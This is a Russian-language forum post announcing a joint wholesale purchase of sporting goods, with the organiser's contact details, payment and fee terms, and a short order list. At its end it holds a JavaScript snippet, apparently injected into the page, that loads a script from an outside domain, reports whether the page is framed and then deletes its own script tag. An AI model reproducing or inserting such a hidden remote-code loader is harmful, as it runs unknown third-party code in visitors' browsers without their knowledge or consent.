[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]
меня зовут Ирина, ко мне на "ты"
мои контакты
меня зовут Ирина, ко мне на "ты"
мои контакты
- Спойлер:
- 89228784099
- Спойлер:
- Степной, С.Лазо
[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Спортивные товары оптом — это наш конек. В зависимости от сезона в ассортименте имеются роликовые коньки и ледовые коньки, самокаты и скейтборды, лыжные комплекты, а также мячи и инвентарь для футбола, баскетбола, волейбола, а также для большого, настольного тенниса. Если Вас интересуют мячи оптом - обращайтесь к нам, у нас одни из самых конкурентных расценок для Вас, есть постоянное наличие на складе!
Наша цена ОПТ1[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]
- закупка открыта
- минималка 15 00 руб
- орг 12% доставка на всех
- оплата в течение 2 дней на карту СБ
- не забываем про правила
- возможна платная доставка по городу
-если вы не уверены, что сможете во время оплатить и забрать свой товар, лучше не участвуйте.
если вы ознакомились с условиями закупки и вас все устраивает
ДОБРО ПОЖАЛОВАТЬ!
ЗАКАЗЫ
ДОБРО ПОЖАЛОВАТЬ!
ЗАКАЗЫ
- Спойлер:
Скарлет
Игра лото
Олюничка
ростовка 150 см. и 165 см. цена 305 руб.
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] 2 пары креплений цена 235 руб.
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] 3 шт.
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();
Последний раз редактировалось: Иришка (Пт Окт 25, 2013 12:26 pm), всего редактировалось 1 раз(а)